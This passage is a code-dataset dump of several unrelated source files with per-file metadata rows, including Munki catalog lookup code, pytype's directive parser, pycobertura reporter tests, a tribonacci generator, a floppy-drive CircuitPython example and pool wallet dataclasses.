'with supported architectures: %s',
item['name'], item['version'], item['supported_architectures'])
display.display_debug1(
'Our architecture is %s', machine['arch'])
if machine['arch'] in item['supported_architectures']:
return True
if ('x86_64' in item['supported_architectures'] and
machine['arch'] == 'i386' and
machine['x86_64_capable'] is True):
return True
# we didn't find a supported architecture that
# matches this machine
reason = (
'Rejected item %s, version %s with supported architectures: '
'%s. Our architecture is %s.'
% (item['name'], item['version'],
item['supported_architectures'], machine['arch']))
rejected_items.append(reason)
return False
return True
def installable_condition_ok(item):
'''Returns a boolean to indicate if an installable_condition predicate
in the current item passes. If not, also adds the failure reason to
the rejected_items list.'''
if item.get('installable_condition'):
if not info.predicate_evaluates_as_true(
item['installable_condition']):
rejected_items.append(
'Rejected item %s, version %s with installable_condition: '
'%s.' % (item['name'], item['version'],
item['installable_condition']))
return False
return True
if vers == 'apple_update_metadata':
vers = 'latest'
else:
(name, includedversion) = split_name_and_version(name)
if includedversion and vers == '':
vers = includedversion
if vers:
vers = pkgutils.trim_version_string(vers)
else:
vers = 'latest'
if skip_min_os_check:
display.display_debug1(
'Looking for detail for: %s, version %s, '
'ignoring minimum_os_version...', name, vers)
else:
display.display_debug1(
'Looking for detail for: %s, version %s...', name, vers)
for catalogname in cataloglist:
# is name in the catalog?
if catalogname in _CATALOG and name in _CATALOG[catalogname]['named']:
itemsmatchingname = _CATALOG[catalogname]['named'][name]
indexlist = []
if vers == 'latest':
# order all our items, highest version first
versionlist = list(itemsmatchingname.keys())
versionlist.sort(key=pkgutils.MunkiLooseVersion, reverse=True)
for versionkey in versionlist:
indexlist.extend(itemsmatchingname[versionkey])
elif vers in list(itemsmatchingname.keys()):
# get the specific requested version
indexlist = itemsmatchingname[vers]
if indexlist:
display.display_debug1(
'Considering %s items with name %s from catalog %s' %
(len(indexlist), name, catalogname))
for index in indexlist:
# iterate through list of items with matching name, highest
# version first, looking for first one that passes all the
# conditional tests (if any)
item = _CATALOG[catalogname]['items'][index]
if (munki_version_ok(item) and
os_version_ok(item,
skip_min_os_check=skip_min_os_check) and
cpu_arch_ok(item) and
installable_condition_ok(item)):
display.display_debug1(
'Found %s, version %s in catalog %s',
item['name'], item['version'], catalogname)
return item
# if we got this far, we didn't find it.
display.display_debug1('Not found')
for reason in rejected_items:
if suppress_warnings:
display.display_debug1(reason)
else:
display.display_warning(reason)
return None
# global to hold our catalog DBs
_CATALOG = {}
def get_catalogs(cataloglist):
"""Retrieves the catalogs from the server and populates our catalogs
dictionary.
"""
#global _CATALOG
for catalogname in cataloglist:
if not catalogname in _CATALOG:
catalogpath = download.download_catalog(catalogname)
if catalogpath:
try:
catalogdata = FoundationPlist.readPlist(catalogpath)
except FoundationPlist.NSPropertyListSerializationException:
display.display_error(
'Retrieved catalog %s is invalid.', catalogname)
try:
os.unlink(catalogpath)
except (OSError, IOError):
pass
else:
_CATALOG[catalogname] = make_catalog_db(catalogdata)
def clean_up():
"""Removes any catalog files that are no longer in use by this client"""
catalog_dir = os.path.join(prefs.pref('ManagedInstallDir'),
'catalogs')
for item in os.listdir(catalog_dir):
if item not in _CATALOG:
os.unlink(os.path.join(catalog_dir, item))
def catalogs():
'''Returns our internal _CATALOG dict'''
return _CATALOG
if __name__ == '__main__':
print('This is a library of support tools for the Munki Suite.')
| 40.826893 | 80 | 0.617831 | [
"Apache-2.0"
] | Artoria2e5/munki | code/client/munkilib/updatecheck/catalogs.py | 26,415 | Python |
#--- Exercise 1 - Functions - 1
#--- Write a function that prints a header
#--- The header must be written using character multiplication
#--- expected result: -------------- Cadastro Serasa --------------------------
#--- The header must contain the name of a company, which will be a variable
#--- Call the function on the last line of your program
nome_empresa = input("Insira o nome da empresa: ")
def imprimir_cabecalho():
    print("-" * 10, "Cadastro", nome_empresa, "-" * 10)
imprimir_cabecalho() | 40.769231 | 82 | 0.658491 | [
"MIT"
] | AmandaRH07/Entra21_Python | 01-Exercicios/Aula007/Ex1.py | 545 | Python |
# coding=utf-8
from typing import Iterable
from .registry import registry
@registry.register("A000073")
def tribonacci() -> Iterable[int]:
"""Tribonacci numbers."""
yield 0
yield 0
yield 1
p3: int = 0 # tribonacci(0)
p2: int = 0 # tribonacci(1)
p1: int = 1 # tribonacci(2)
while True:
curr: int = p1 + p2 + p3
yield curr
p1, p2, p3 = curr, p1, p2
| 20.45 | 34 | 0.581907 | [
"MIT"
] | reidhoch/oeis-seq | oeis/tribonacci.py | 409 | Python |
from dataclasses import dataclass
from enum import IntEnum
from typing import Optional, Dict
from blspy import G1Element
from wheat.protocols.pool_protocol import POOL_PROTOCOL_VERSION
from wheat.types.blockchain_format.coin import Coin
from wheat.types.blockchain_format.program import Program
from wheat.types.blockchain_format.sized_bytes import bytes32
from wheat.util.byte_types import hexstr_to_bytes
from wheat.util.ints import uint32, uint8
from wheat.util.streamable import streamable, Streamable
class PoolSingletonState(IntEnum):
"""
From the user's point of view, a pool group can be in these states:
`SELF_POOLING`: The singleton exists on the blockchain, and we are farming
block rewards to a wallet address controlled by the user
`LEAVING_POOL`: The singleton exists, and we have entered the "escaping" state, which
means we are waiting for a number of blocks = `relative_lock_height` to pass, so we can leave.
`FARMING_TO_POOL`: The singleton exists, and it is assigned to a pool.
`CLAIMING_SELF_POOLED_REWARDS`: We have submitted a transaction to sweep our
self-pooled funds.
"""
SELF_POOLING = 1
LEAVING_POOL = 2
FARMING_TO_POOL = 3
SELF_POOLING = PoolSingletonState.SELF_POOLING
LEAVING_POOL = PoolSingletonState.LEAVING_POOL
FARMING_TO_POOL = PoolSingletonState.FARMING_TO_POOL
@dataclass(frozen=True)
@streamable
class PoolState(Streamable):
"""
`PoolState` is a type that is serialized to the blockchain to track the state of the user's pool singleton
`target_puzzle_hash` is either the pool address, or the self-pooling address that pool rewards will be paid to.
`target_puzzle_hash` is NOT the p2_singleton puzzle that block rewards are sent to.
The `p2_singleton` address is the initial address, and the `target_puzzle_hash` is the final destination.
`relative_lock_height` is zero when in SELF_POOLING state
"""
version: uint8
state: uint8 # PoolSingletonState
# `target_puzzle_hash`: A puzzle_hash we pay to
# When self-farming, this is a main wallet address
# When farming-to-pool, the pool sends this to the farmer during pool protocol setup
target_puzzle_hash: bytes32 # TODO: rename target_puzzle_hash -> pay_to_address
# owner_pubkey is set by the wallet, once
owner_pubkey: G1Element
pool_url: Optional[str]
relative_lock_height: uint32
def initial_pool_state_from_dict(state_dict: Dict, owner_pubkey: G1Element, owner_puzzle_hash: bytes32) -> PoolState:
state_str = state_dict["state"]
singleton_state: PoolSingletonState = PoolSingletonState[state_str]
if singleton_state == SELF_POOLING:
target_puzzle_hash = owner_puzzle_hash
pool_url: str = ""
relative_lock_height = uint32(0)
elif singleton_state == FARMING_TO_POOL:
target_puzzle_hash = bytes32(hexstr_to_bytes(state_dict["target_puzzle_hash"]))
pool_url = state_dict["pool_url"]
relative_lock_height = uint32(state_dict["relative_lock_height"])
else:
raise ValueError("Initial state must be SELF_POOLING or FARMING_TO_POOL")
# TODO: change create_pool_state to return error messages, as well
assert relative_lock_height is not None
return create_pool_state(singleton_state, target_puzzle_hash, owner_pubkey, pool_url, relative_lock_height)
def create_pool_state(
state: PoolSingletonState,
target_puzzle_hash: bytes32,
owner_pubkey: G1Element,
pool_url: Optional[str],
relative_lock_height: uint32,
) -> PoolState:
if state not in set(s.value for s in PoolSingletonState):
raise AssertionError("state {state} is not a valid PoolSingletonState,")
ps = PoolState(
POOL_PROTOCOL_VERSION, uint8(state), target_puzzle_hash, owner_pubkey, pool_url, relative_lock_height
)
# TODO Move verify here
return ps
@dataclass(frozen=True)
@streamable
class PoolWalletInfo(Streamable):
"""
Internal Pool Wallet state, not destined for the blockchain. This can be completely derived with
the Singleton's CoinSolutions list, or with the information from the WalletPoolStore.
"""
current: PoolState
target: Optional[PoolState]
launcher_coin: Coin
launcher_id: bytes32
p2_singleton_puzzle_hash: bytes32
current_inner: Program # Inner puzzle in current singleton, not revealed yet
tip_singleton_coin_id: bytes32
singleton_block_height: uint32 # Block height that current PoolState is from
| 38.87069 | 117 | 0.758261 | [
"Apache-2.0"
] | Jsewill/wheat-blockchain | wheat/pools/pool_wallet_info.py | 4,509 | Python |
# SPDX-FileCopyrightText: 2017 Scott Shawcroft, written for Adafruit Industries
# SPDX-FileCopyrightText: Copyright (c) 2022 Jeff Epler for Adafruit Industries
#
# SPDX-License-Identifier: Unlicense
# On an Adafruit Feather M4 or Adafruit Feather RP2040 with Floppy Featherwing,
# do some track-to-track seeking and flux reading.
import board
import adafruit_floppy
D24 = getattr(board, "D24") or getattr(board, "A4")
D25 = getattr(board, "D25") or getattr(board, "A5")
floppy = adafruit_floppy.MFMFloppy(
densitypin=board.A0,
indexpin=board.A1,
selectpin=board.A2,
motorpin=board.A3,
directionpin=D24,
steppin=D25,
track0pin=board.D11,
protectpin=board.D10,
rddatapin=board.D9,
sidepin=board.D6,
readypin=board.D5,
)
floppy.selected = True
floppy.spin = True
print("Seek track 8")
floppy.track = 8
print("Seek track 0")
floppy.track = 0
print("Read partial track raw flux data")
buf = bytearray(30000)
n_read = floppy.flux_readinto(buf)
print("read", n_read)
buckets = [0] * 256
for b in buf:
buckets[b] += 1
oi = -1
for i, bi in enumerate(buckets):
if bi > 0:
if i != oi + 1:
print("---")
oi = i
print(f"{i:3} {bi:5}")
| 24.77551 | 79 | 0.682043 | [
"MIT"
] | jepler/Adafruit_CircuitPython_floppy | examples/floppy_simpletest.py | 1,214 | Python |
"""Code and data structures for managing source directives."""
import bisect
import collections
import re
import sys
import tokenize
from pytype import utils
from six import moves
_DIRECTIVE_RE = re.compile(r"#\s*(pytype|type)\s*:\s?([^#]*)")
_CLOSING_BRACKETS_RE = re.compile(r"^(\s*[]})]\s*)+(#.*)?$")
_WHITESPACE_RE = re.compile(r"^\s*(#.*)?$")
_CLASS_OR_FUNC_RE = re.compile(r"^(def|class)\s")
_DOCSTRING_RE = re.compile(r"^\s*(\"\"\"|''')")
_ALL_ERRORS = "*" # Wildcard for disabling all errors.
class _DirectiveError(Exception):
pass
class SkipFile(Exception):
"""Exception thrown if we encounter "pytype: skip-file" in the source code."""
class _LineSet(object):
"""A set of line numbers.
The data structure is optimized to represent the union of a sparse set
of integers and ranges of non-negative integers. This supports the two styles
of directives: those after a statement apply only to that line and those on
their own line apply until countered by the opposing directive.
"""
def __init__(self):
# Map of line->bool for specific lines, takes precedence over _transitions.
self._lines = {}
# A sorted list of the lines at which the range state changes
# polarity. It is assumed to initially be false (not in a range).
# Even positions represent the start of a range, odd positions represent
# the end of a range. Thus [2, 5, 10, 12] would include lines 2, 3, 4, 10,
# and 11. If the length is odd, then an end of maxint is implied, thus
# [2, 5, 10] would disable lines 2, 3, 4, 10, 11, 12, ...
self._transitions = []
def set_line(self, line, membership):
"""Set whether a given line is a member of the set."""
self._lines[line] = membership
def start_range(self, line, membership):
"""Start a range of lines that are either included/excluded from the set.
Args:
line: A line number.
membership: If True, lines >= line are included in the set (starting
a range), otherwise they are excluded (ending a range).
Raises:
ValueError: if line is less than that of a previous call to start_range().
"""
last = self._transitions[-1] if self._transitions else -1
# Assert that lines are monotonically increasing. This simplifies the
# logic of adding new lines and ensures that _ranges is sorted.
if line < last:
raise ValueError("Line number less than previous start_range() call.")
# Determine previous membership state (True if the last range has an
# indefinite end).
previous = (len(self._transitions) % 2) == 1
if membership == previous:
# TODO(dbaum): Consider issuing a warning here.
return # Redundant with previous state, do nothing.
elif line == last:
# We have either enable/disable or disable/enable on the same line,
# cancel them out by popping the previous transition.
self._transitions.pop()
else:
# Normal case - add a transition at this line.
self._transitions.append(line)
def __contains__(self, line):
"""Return if a line is a member of the set."""
# First check for an entry in _lines.
specific = self._lines.get(line)
if specific is not None:
return specific
# Find the position in _ranges for line. The polarity of this position
# determines whether we are inside a range (odd) or outside (even).
pos = bisect.bisect(self._transitions, line)
return (pos % 2) == 1
def get_disable_after(self, lineno):
"""Get an unclosed disable, if any, that starts after lineno."""
if len(self._transitions) % 2 == 1 and self._transitions[-1] >= lineno:
return self._transitions[-1]
return None
class Director(object):
"""Holds all of the directive information for a source file."""
def __init__(self, src, errorlog, filename, disable):
"""Create a Director for a source file.
Args:
src: The source text as a string.
errorlog: An ErrorLog object. Directive errors will be logged to the
errorlog.
filename: The name of the source file.
disable: List of error messages to always ignore.
"""
self._filename = filename
self._errorlog = errorlog
self._type_comments = {} # Map from line number to (code, comment).
self._docstrings = set() # Start lines of docstrings.
# Lines that have "type: ignore". These will disable all errors, and in
# the future may have other impact (such as not attempting an import).
self._ignore = _LineSet()
# Map from error name to lines for which that error is disabled. Note
# that _ALL_ERRORS is essentially a wildcard name (it matches all names).
self._disables = collections.defaultdict(_LineSet)
# Apply global disable, from the command line arguments:
for error_name in disable:
self._disables[error_name].start_range(0, True)
# Parse the source code for directives.
self._parse_source(src)
@property
def type_comments(self):
return self._type_comments
@property
def docstrings(self):
return sorted(self._docstrings)
@property
def ignore(self):
return self._ignore
def _adjust_type_comments(self, closing_bracket_lines, whitespace_lines):
"""Adjust any type comments affected by closing bracket lines.
Lines that contain nothing but closing brackets don't appear in the
bytecode, so for, e.g.,
v = [
"hello",
"world",
] # line 4
line 4 is where any type comment for 'v' should be put, but the
STORE_NAME opcode for 'v' is at line 3. If we find a type comment put
(wrongly) on line 3, we'll report an error, and if we find a type comment
on line 4, we'll move it to line 3.
Args:
closing_bracket_lines: A set of lines containing only closing brackets,
to be used for adjusting affected type comments.
whitespace_lines: A set of lines containing only whitespace. Its union
with closing_bracket_lines is a set of consecutive lines.
"""
target = min(closing_bracket_lines | whitespace_lines) - 1
if target in self._type_comments:
self._errorlog.ignored_type_comment(
self._filename, target, self._type_comments[target][1])
del self._type_comments[target]
end = max(closing_bracket_lines)
if end in self._type_comments:
self._type_comments[target] = self._type_comments[end]
del self._type_comments[end]
def _parse_source(self, src):
"""Parse a source file, extracting directives from comments."""
f = moves.StringIO(src)
defs_start = None
closing_bracket_lines = set()
whitespace_lines = set()
for tok, _, start, _, line in tokenize.generate_tokens(f.readline):
lineno, col = start
if defs_start is None and _CLASS_OR_FUNC_RE.match(line):
defs_start = lineno
if _CLOSING_BRACKETS_RE.match(line):
closing_bracket_lines.add(lineno)
elif _WHITESPACE_RE.match(line):
whitespace_lines.add(lineno)
elif _DOCSTRING_RE.match(line):
self._docstrings.add(lineno)
else:
if closing_bracket_lines:
self._adjust_type_comments(closing_bracket_lines, whitespace_lines)
closing_bracket_lines.clear()
whitespace_lines.clear()
if tok == tokenize.COMMENT:
matches = list(_DIRECTIVE_RE.finditer(line[col:]))
is_nested = bool(matches) and matches[0].start(0) > 0
for m in matches:
code = line[:col].strip()
tool, data = m.groups()
open_ended = not code
data = data.strip()
if tool == "type":
self._process_type(lineno, code, data, is_nested)
elif tool == "pytype":
try:
self._process_pytype(lineno, data, open_ended)
except _DirectiveError as e:
self._errorlog.invalid_directive(
self._filename, lineno, utils.message(e))
else:
pass # ignore comments for other tools
if closing_bracket_lines:
self._adjust_type_comments(closing_bracket_lines, whitespace_lines)
if defs_start is not None:
disables = list(self._disables.items())
# Add "# type: ignore" to the list of disables that we check.
disables.append(("Type checking", self._ignore))
for name, lineset in disables:
lineno = lineset.get_disable_after(defs_start)
if lineno is not None:
self._errorlog.late_directive(self._filename, lineno, name)
def _process_type(self, lineno, code, data, is_nested):
"""Process a type: comment."""
# Discard type comments embedded in larger whole-line comments.
if not code and is_nested:
return
if lineno in self._type_comments:
# If we have multiple type comments on the same line, take the last one,
# but add an error to the log.
self._errorlog.invalid_directive(
self._filename, lineno,
"Multiple type comments on the same line.")
if data == "ignore":
if not code:
self._ignore.start_range(lineno, True)
else:
self._ignore.set_line(lineno, True)
else:
self._type_comments[lineno] = (code, data)
def _process_pytype(self, lineno, data, open_ended):
"""Process a pytype: comment."""
if not data:
raise _DirectiveError("Invalid directive syntax.")
for option in data.split():
# Parse the command.
if option == "skip-file":
raise SkipFile()
try:
command, values = option.split("=", 1)
values = values.split(",")
except ValueError:
raise _DirectiveError("Invalid directive syntax.")
# Additional commands may be added in the future. For now, only
# "disable" and "enable" are supported.
if command == "disable":
disable = True
elif command == "enable":
disable = False
else:
raise _DirectiveError("Unknown pytype directive: '%s'" % command)
if not values:
raise _DirectiveError(
"Disable/enable must specify one or more error names.")
for error_name in values:
if (error_name == _ALL_ERRORS or
self._errorlog.is_valid_error_name(error_name)):
lines = self._disables[error_name]
if open_ended:
lines.start_range(lineno, disable)
else:
lines.set_line(lineno, disable)
else:
self._errorlog.invalid_directive(
self._filename, lineno, "Invalid error name: '%s'" % error_name)
def should_report_error(self, error):
"""Return whether the error should be logged.
This method is suitable for use as an error filter.
Args:
error: An error._Error object.
Returns:
True iff the error should be included in the log.
"""
# Always report errors that aren't for this file or do not have a line
# number.
if error.filename != self._filename or error.lineno is None:
return True
# Treat lineno=0 as below the file, so we can filter it.
lineno = error.lineno or sys.maxsize
# Report the error if it isn't subject to any ignore or disable.
return (lineno not in self._ignore and
lineno not in self._disables[_ALL_ERRORS] and
lineno not in self._disables[error.name])
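if __name__ == "__main__":
  # Illustrative sketch (an addition for clarity, not part of pytype): how
  # _LineSet combines open-ended ranges with per-line overrides. Importing
  # this module requires pytype and six to be available.
  demo = _LineSet()
  demo.start_range(10, True)   # lines >= 10 are in the set...
  demo.start_range(20, False)  # ...until (but not including) line 20
  demo.set_line(15, False)     # except line 15, overridden individually
  print([line for line in range(9, 21) if line in demo])
  # -> [10, 11, 12, 13, 14, 16, 17, 18, 19]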
| 38.013468 | 80 | 0.66519 | [
"Apache-2.0"
] | Flameeyes/pytype | pytype/directors.py | 11,290 | Python |
from .utils import make_cobertura
def remove_style_tag(html):
style_pattern_start = '\n <style>'
style_pattern_stop = '\n </style>'
style_starts = html.find(style_pattern_start)
style_stops = html.find(style_pattern_stop) + len(style_pattern_stop)
html_nostyle = html[:style_starts] + html[style_stops:]
return html_nostyle
def test_text_report():
from pycobertura.reporters import TextReporter
cobertura = make_cobertura()
report = TextReporter(cobertura)
assert report.generate() == """\
Filename Stmts Miss Cover Missing
------------------------------ ------- ------ ------- ---------
Main.java 11 0 100.00%
search/BinarySearch.java 12 1 91.67% 24
search/ISortedArraySearch.java 0 0 100.00%
search/LinearSearch.java 7 2 71.43% 19-24
TOTAL 30 3 90.00%"""
def test_text_report__with_missing_range():
from pycobertura.reporters import TextReporter
cobertura = make_cobertura('tests/dummy.with-dummy2-no-cov.xml')
report = TextReporter(cobertura)
assert report.generate() == """\
Filename Stmts Miss Cover Missing
----------------- ------- ------ ------- ---------
dummy/__init__.py 0 0 0.00%
dummy/dummy.py 4 0 100.00%
dummy/dummy2.py 2 2 0.00% 1-2
TOTAL 6 2 66.67%"""
def test_text_report_delta__no_diff():
from pycobertura.reporters import TextReporterDelta
cobertura1 = make_cobertura('tests/dummy.source1/coverage.xml')
cobertura2 = make_cobertura('tests/dummy.source1/coverage.xml')
report_delta = TextReporterDelta(cobertura1, cobertura2)
assert report_delta.generate() == """\
Filename Stmts Miss Cover Missing
---------- ------- ------ ------- ---------
TOTAL - - -"""
def test_text_report_delta__colorize_True():
from pycobertura.reporters import TextReporterDelta
cobertura1 = make_cobertura('tests/dummy.source1/coverage.xml')
cobertura2 = make_cobertura('tests/dummy.source2/coverage.xml')
report_delta = TextReporterDelta(cobertura1, cobertura2, color=True)
assert report_delta.generate() == """\
Filename Stmts Miss Cover Missing
--------------- ------- ------ ------- ----------
dummy/dummy.py - \x1b[32m-2\x1b[39m +40.00% \x1b[32m-5\x1b[39m, \x1b[32m-6\x1b[39m
dummy/dummy2.py +2 \x1b[31m+1\x1b[39m -25.00% \x1b[32m-2\x1b[39m, \x1b[32m-4\x1b[39m, \x1b[31m+5\x1b[39m
dummy/dummy3.py +2 \x1b[31m+2\x1b[39m - \x1b[31m+1\x1b[39m, \x1b[31m+2\x1b[39m
TOTAL +4 \x1b[31m+1\x1b[39m +31.06%"""
def test_text_report_delta__colorize_True__with_missing_range():
from pycobertura.reporters import TextReporterDelta
cobertura1 = make_cobertura('tests/dummy.source1/coverage.xml')
cobertura2 = make_cobertura('tests/dummy.source2/coverage.xml')
report_delta = TextReporterDelta(cobertura1, cobertura2, color=True)
assert report_delta.generate() == """\
Filename Stmts Miss Cover Missing
--------------- ------- ------ ------- ----------
dummy/dummy.py - \x1b[32m-2\x1b[39m +40.00% \x1b[32m-5\x1b[39m, \x1b[32m-6\x1b[39m
dummy/dummy2.py +2 \x1b[31m+1\x1b[39m -25.00% \x1b[32m-2\x1b[39m, \x1b[32m-4\x1b[39m, \x1b[31m+5\x1b[39m
dummy/dummy3.py +2 \x1b[31m+2\x1b[39m - \x1b[31m+1\x1b[39m, \x1b[31m+2\x1b[39m
TOTAL +4 \x1b[31m+1\x1b[39m +31.06%"""
def test_text_report_delta__colorize_False():
from pycobertura.reporters import TextReporterDelta
cobertura1 = make_cobertura('tests/dummy.source1/coverage.xml')
cobertura2 = make_cobertura('tests/dummy.source2/coverage.xml')
report_delta = TextReporterDelta(cobertura1, cobertura2, color=False)
assert report_delta.generate() == """\
Filename Stmts Miss Cover Missing
--------------- ------- ------ ------- ----------
dummy/dummy.py - -2 +40.00% -5, -6
dummy/dummy2.py +2 +1 -25.00% -2, -4, +5
dummy/dummy3.py +2 +2 - +1, +2
TOTAL +4 +1 +31.06%"""
def test_html_report():
from pycobertura.reporters import HtmlReporter
cobertura = make_cobertura()
report = HtmlReporter(cobertura)
html_output = report.generate()
assert "normalize.css" in html_output
assert "Skeleton V2.0" in html_output
assert remove_style_tag(html_output) == """\
<html>
<head>
<title>pycobertura report</title>
<meta charset="UTF-8">
</head>
<body>
<div class="container">
<table class="u-full-width">
<thead>
<tr>
<th>Filename</th>
<th>Stmts</th>
<th>Miss</th>
<th>Cover</th>
<th>Missing</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="#Main.java">Main.java</a></td>
<td>11</td>
<td>0</td>
<td>100.00%</td>
<td></td>
</tr>
<tr>
<td><a href="#search/BinarySearch.java">search/BinarySearch.java</a></td>
<td>12</td>
<td>1</td>
<td>91.67%</td>
<td>24</td>
</tr>
<tr>
<td><a href="#search/ISortedArraySearch.java">search/ISortedArraySearch.java</a></td>
<td>0</td>
<td>0</td>
<td>100.00%</td>
<td></td>
</tr>
<tr>
<td><a href="#search/LinearSearch.java">search/LinearSearch.java</a></td>
<td>7</td>
<td>2</td>
<td>71.43%</td>
<td>19-24</td>
</tr>
</tbody>
<tfoot>
<tr>
<td>TOTAL</td>
<td>30</td>
<td>3</td>
<td>90.00%</td>
<td></td>
</tr>
</tfoot>
</table>
<h4 id="Main.java">Main.java</h4>
<table class="code u-max-full-width">
<tbody>
<tr>
<td class="lineno">
<pre>0
</pre>
</td>
<td class="source">
<pre><span class="noop">tests/Main.java not found</span></pre>
</td>
</tr>
</tbody>
</table>
<h4 id="search/BinarySearch.java">search/BinarySearch.java</h4>
<table class="code u-max-full-width">
<tbody>
<tr>
<td class="lineno">
<pre>0
</pre>
</td>
<td class="source">
<pre><span class="noop">tests/search/BinarySearch.java not found</span></pre>
</td>
</tr>
</tbody>
</table>
<h4 id="search/ISortedArraySearch.java">search/ISortedArraySearch.java</h4>
<table class="code u-max-full-width">
<tbody>
<tr>
<td class="lineno">
<pre>0
</pre>
</td>
<td class="source">
<pre><span class="noop">tests/search/ISortedArraySearch.java not found</span></pre>
</td>
</tr>
</tbody>
</table>
<h4 id="search/LinearSearch.java">search/LinearSearch.java</h4>
<table class="code u-max-full-width">
<tbody>
<tr>
<td class="lineno">
<pre>0
</pre>
</td>
<td class="source">
<pre><span class="noop">tests/search/LinearSearch.java not found</span></pre>
</td>
</tr>
</tbody>
</table>
</div>
</body>
</html>"""
def test_text_report_delta__no_source():
from pycobertura.reporters import TextReporterDelta
cobertura1 = make_cobertura('tests/dummy.source1/coverage.xml')
cobertura2 = make_cobertura('tests/dummy.source2/coverage.xml')
report_delta = TextReporterDelta(cobertura1, cobertura2, show_source=False)
output = report_delta.generate()
assert output == """\
Filename Stmts Miss Cover
--------------- ------- ------ -------
dummy/dummy.py - -2 +40.00%
dummy/dummy2.py +2 +1 -25.00%
dummy/dummy3.py +2 +2 -
TOTAL +4 +1 +31.06%"""
def test_html_report_delta__no_source():
from pycobertura.reporters import HtmlReporterDelta
cobertura1 = make_cobertura('tests/dummy.source1/coverage.xml')
cobertura2 = make_cobertura('tests/dummy.source2/coverage.xml')
report_delta = HtmlReporterDelta(cobertura1, cobertura2, show_source=False)
html_output = report_delta.generate()
assert 'Missing' not in html_output
assert '<h4 id=' not in html_output
assert remove_style_tag(html_output) == """\
<html>
<head>
<title>pycobertura report</title>
<meta charset="UTF-8">
</head>
<body>
<div class="container">
<table class="u-full-width">
<thead>
<tr>
<th>Filename</th>
<th>Stmts</th>
<th>Miss</th>
<th>Cover</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="#dummy/dummy.py">dummy/dummy.py</a></td>
<td>-</td>
<td><span class="green">-2</span></td>
<td>+40.00%</td>
</tr>
<tr>
<td><a href="#dummy/dummy2.py">dummy/dummy2.py</a></td>
<td>+2</td>
<td><span class="red">+1</span></td>
<td>-25.00%</td>
</tr>
<tr>
<td><a href="#dummy/dummy3.py">dummy/dummy3.py</a></td>
<td>+2</td>
<td><span class="red">+2</span></td>
<td>-</td>
</tr>
</tbody>
<tfoot>
<tr>
<td>TOTAL</td>
<td>+4</td>
<td><span class="red">+1</span></td>
<td>+31.06%</td>
</tr>
</tfoot>
</table>
</div>
</body>
</html>"""
def test_html_report_delta():
from pycobertura.reporters import HtmlReporterDelta
cobertura1 = make_cobertura('tests/dummy.source1/coverage.xml')
cobertura2 = make_cobertura('tests/dummy.source2/coverage.xml')
report_delta = HtmlReporterDelta(cobertura1, cobertura2)
html_output = report_delta.generate()
assert '.red {color: red}' in html_output
assert '.green {color: green}' in html_output
assert "normalize.css" in html_output
assert "Skeleton V2.0" in html_output
assert remove_style_tag(html_output) == u"""\
<html>
<head>
<title>pycobertura report</title>
<meta charset="UTF-8">
</head>
<body>
<div class="container">
<table class="u-full-width">
<thead>
<tr>
<th>Filename</th>
<th>Stmts</th>
<th>Miss</th>
<th>Cover</th>
<th>Missing</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="#dummy/dummy.py">dummy/dummy.py</a></td>
<td>-</td>
<td><span class="green">-2</span></td>
<td>+40.00%</td>
<td><span class="green">-5</span>, <span class="green">-6</span>
</td>
</tr>
<tr>
<td><a href="#dummy/dummy2.py">dummy/dummy2.py</a></td>
<td>+2</td>
<td><span class="red">+1</span></td>
<td>-25.00%</td>
<td><span class="green">-2</span>, <span class="green">-4</span>, <span class="red">+5</span>
</td>
</tr>
<tr>
<td><a href="#dummy/dummy3.py">dummy/dummy3.py</a></td>
<td>+2</td>
<td><span class="red">+2</span></td>
<td>-</td>
<td><span class="red">+1</span>, <span class="red">+2</span>
</td>
</tr>
</tbody>
<tfoot>
<tr>
<td>TOTAL</td>
<td>+4</td>
<td><span class="red">+1</span></td>
<td>+31.06%</td>
<td></td>
</tr>
</tfoot>
</table><div class="legend">
<dl>
<dt><code>code</code></dt><dd>coverage unchanged</dd>
<dt class="hit"><code>code</code></dt><dd>coverage increased</dd>
<dt class="miss"><code>code</code></dt><dd>coverage decreased</dd>
<dt><code>+</code></dt><dd>line added or modified</dd>
</dl>
</div>
<h4 id="dummy/dummy.py">dummy/dummy.py</h4>
<table class="code u-max-full-width">
<tbody>
<tr>
<td class="lineno">
<pre>2
3
4
5
6 +
</pre>
</td>
<td class="source">
<pre><span class="noop"> pass
</span><span class="noop">
</span><span class="noop">def bar():
</span><span class="hit"> a = 'a'
</span><span class="hit"> d = 'd'
</span></pre>
</td>
</tr>
</tbody>
</table>
<h4 id="dummy/dummy2.py">dummy/dummy2.py</h4>
<table class="code u-max-full-width">
<tbody>
<tr>
<td class="lineno">
<pre>1
2 +
3
4 +
5
</pre>
</td>
<td class="source">
<pre><span class="noop">def baz():
</span><span class="hit"> c = 'c'
</span><span class="noop">
</span><span class="hit">def bat():
</span><span class="miss"> pass
</span></pre>
</td>
</tr>
</tbody>
</table>
<h4 id="dummy/dummy3.py">dummy/dummy3.py</h4>
<table class="code u-max-full-width">
<tbody>
<tr>
<td class="lineno">
<pre>1 +
2 +
</pre>
</td>
<td class="source">
<pre><span class="miss">def foobar():
</span><span class="miss"> pass # This is a very long comment that was purposefully written so we could test how HTML rendering looks like when the boundaries of the page are reached. And here is a non-ascii char: \u015e
</span></pre>
</td>
</tr>
</tbody>
</table>
</div>
</body>
</html>"""
| 29.940919 | 224 | 0.529708 | ["MIT"] | kannaiah/pycobertura | tests/test_reporters.py | 13,683 | Python |
import os
import time
import torch
import torch.nn as nn
import utils
from torch.autograd import Variable
import numpy as np
import matplotlib.pyplot as plt
def instance_bce_with_logits(logits, labels):
assert logits.dim() == 2
loss = nn.functional.binary_cross_entropy_with_logits(logits, labels)
    # binary_cross_entropy_with_logits averages over every element of the
    # (batch x num_answers) matrix; scaling by the number of answer candidates turns
    # this into a per-example sum over answers, averaged over the batch.
    loss *= labels.size(1)
return loss
def compute_score_with_logits(logits, labels):
logits = torch.max(logits, 1)[1].data # argmax
one_hots = torch.zeros(*labels.size()).cuda()
one_hots.scatter_(1, logits.view(-1, 1), 1)
scores = (one_hots * labels)
return scores
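# Toy illustration of the scoring above (shapes and values are made up; mirrors the
# call sites below, where `pred` is the model output and `a` the soft answer target):
#
#   pred = Variable(torch.Tensor([[0.1, 2.0, 0.3]])).cuda()   # argmax -> answer 1
#   target = torch.Tensor([[0.0, 0.6, 0.0]]).cuda()           # 0.6 credit for answer 1
#   compute_score_with_logits(pred, target).sum()             # -> 0.6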
def train(model, train_loader, eval_loader, num_epochs, output, opt, wd):
utils.create_dir(output)
